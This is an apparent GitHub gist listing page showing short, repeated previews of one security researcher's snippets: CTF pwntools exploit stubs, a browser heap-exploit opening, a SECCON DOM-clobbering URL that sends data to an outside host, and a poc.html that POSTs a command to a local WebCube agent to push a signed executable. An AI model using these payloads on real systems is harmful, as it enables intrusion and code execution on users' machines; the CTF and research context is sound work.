Posix po6ix

## South_Korea.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                po6ix
                / South_Korea.md
            
            
              Last active
              November 2, 2023 03:13
            
              
                South Korea
              
          
    Seoul

Seoul is the vibrant capital city of South Korea, known for its rich history, cutting-edge technology, and dynamic culture.
As the heart of the country, Seoul is a bustling metropolis that seamlessly blends tradition with modernity. (ChatGPT)
Transportation

There are four kinds of transportation available in Seoul.

Subway


## fetch-libimobiledevice.sh
#!/bin/sh

set -e

if ! test -x "`which ldid`"; then
  echo "Cannot find ldid, you may install it via Homebrew."
  exit 1
fi

if [ ! -d "$(xcode-select -p)" ]; then

## mac-enable-libfuzzer.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                po6ix
                / mac-enable-libfuzzer.md
            
            
              Created
              September 29, 2023 19:56
                — forked from mcandre/mac-enable-libfuzzer.md
            
              
                macOS Enable libFuzzer
              
          
Run brew install llvm --HEAD.
Update certain shell variables:

# Prefer newer LLVM with fuzzing enabled
# shellcheck source=/dev/null
export CC='clang'
export CXX='clang++'
export LDFLAGS="-L/usr/local/opt/llvm/lib -Wl,-rpath,/usr/local/opt/llvm/lib"
PATH="$(brew --prefix)/opt/llvm/bin:$PATH"

  
## exp.js
refs = new Array(0x100);

// chunk consumer
for (let i = 0; i < 0x20; ++i) {
    refs.push(new ArrayBuffer(0x200));
    refs.push(new Array(0x130));
    refs.push(new Array(0x40));
}

// libc leak

## libmalloc.py
import lldb, struct, shutil

COLOR_YELLOW = '\x1b[33m'
COLOR_GREEN = '\x1b[32m'
COLOR_BLUE = '\x1b[34m'
COLOR_RED = '\x1b[31m'
COLOR_GREY = '\x1b[90m'
COLOR_WHITE = '\x1b[0m'
COLOR_MAGENTA = '\x1b[35m'
COLOR_CYAN = '\x1b[36m'

## poc.html
<script>
flag = 0;
window.onload = window.onfocus = () => {
    if (flag) return;
    fetch('http://127.0.0.1:4567/WebCube/RetCmd?CmdMethod(1061,"1199",5678,"Update is prepared for Webcube!",1111,2222,"<EXE_URL_SIGNED_WITH_TERUTEN>")', {method:'POST'})
};
window.onblur = () => {
    if (flag) return;

    flag = 1;

## CookieSpinner.md

      
              6 files
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                po6ix
                / CookieSpinner.md
            
            
              Last active
              December 12, 2021 14:34
            
              
                SECCON CTF 2021
              
          
    http://web:3000/?window=parentNode&?window=parentNode&view=%3Cform+id=parentNode+name=parentNode%3E%3Cinput+id=parentNode%3E%3C/form%3E%3Ca+id=parentNode+name=location+href=%22http://p6.is:1234?%22%3E%3C/a%3E%3Cx%20i=%22


## babyrop.py
from pwn import *

# p = process('./babyrop')
p = remote('remote1.thcon.party', 10900)
e = ELF('./babyrop')
libc = ELF('./libc6_2.27-3ubuntu1.4_amd64.so')

pop_rdi = 0x00000000004012c3
pop_rsi = 0x00000000004012c1
ret = 0x000000000040101a

## fawncdn.py
from pwn import *

# p = process('./chall')
p = remote('35.224.135.84', 1001)

p.sendlineafter('>', '1')
pie_leak = int(p.recvline()[40:-3], 16)
pie_base = pie_leak - 0x1390

print(hex(pie_leak))

## AP-ABCs.py
from pwn import *

# p = process('./ap-abcs')
p = remote('bin.bcactf.com', 49154)

payload = b'\0'*(0x50-0x4)
payload += p32(0x73434241)

p.sendline(payload)
	#!/bin/sh

	set -e

	if ! test -x "`which ldid`"; then
	echo "Cannot find ldid, you may install it via Homebrew."
	exit 1
	fi

	if [ ! -d "$(xcode-select -p)" ]; then
	refs = new Array(0x100);

	// chunk consumer
	for (let i = 0; i < 0x20; ++i) {
	refs.push(new ArrayBuffer(0x200));
	refs.push(new Array(0x130));
	refs.push(new Array(0x40));
	}

	// libc leak
	import lldb, struct, shutil

	COLOR_YELLOW = '\x1b[33m'
	COLOR_GREEN = '\x1b[32m'
	COLOR_BLUE = '\x1b[34m'
	COLOR_RED = '\x1b[31m'
	COLOR_GREY = '\x1b[90m'
	COLOR_WHITE = '\x1b[0m'
	COLOR_MAGENTA = '\x1b[35m'
	COLOR_CYAN = '\x1b[36m'
	<script>
	flag = 0;
	window.onload = window.onfocus = () => {
	if (flag) return;
	fetch('http://127.0.0.1:4567/WebCube/RetCmd?CmdMethod(1061,"1199",5678,"Update is prepared for Webcube!",1111,2222,"<EXE_URL_SIGNED_WITH_TERUTEN>")', {method:'POST'})
	};
	window.onblur = () => {
	if (flag) return;

	flag = 1;
	from pwn import *

	# p = process('./babyrop')
	p = remote('remote1.thcon.party', 10900)
	e = ELF('./babyrop')
	libc = ELF('./libc6_2.27-3ubuntu1.4_amd64.so')

	pop_rdi = 0x00000000004012c3
	pop_rsi = 0x00000000004012c1
	ret = 0x000000000040101a
	from pwn import *

	# p = process('./chall')
	p = remote('35.224.135.84', 1001)

	p.sendlineafter('>', '1')
	pie_leak = int(p.recvline()[40:-3], 16)
	pie_base = pie_leak - 0x1390

	print(hex(pie_leak))
	from pwn import *

	# p = process('./ap-abcs')
	p = remote('bin.bcactf.com', 49154)

	payload = b'\0'*(0x50-0x4)
	payload += p32(0x73434241)

	p.sendline(payload)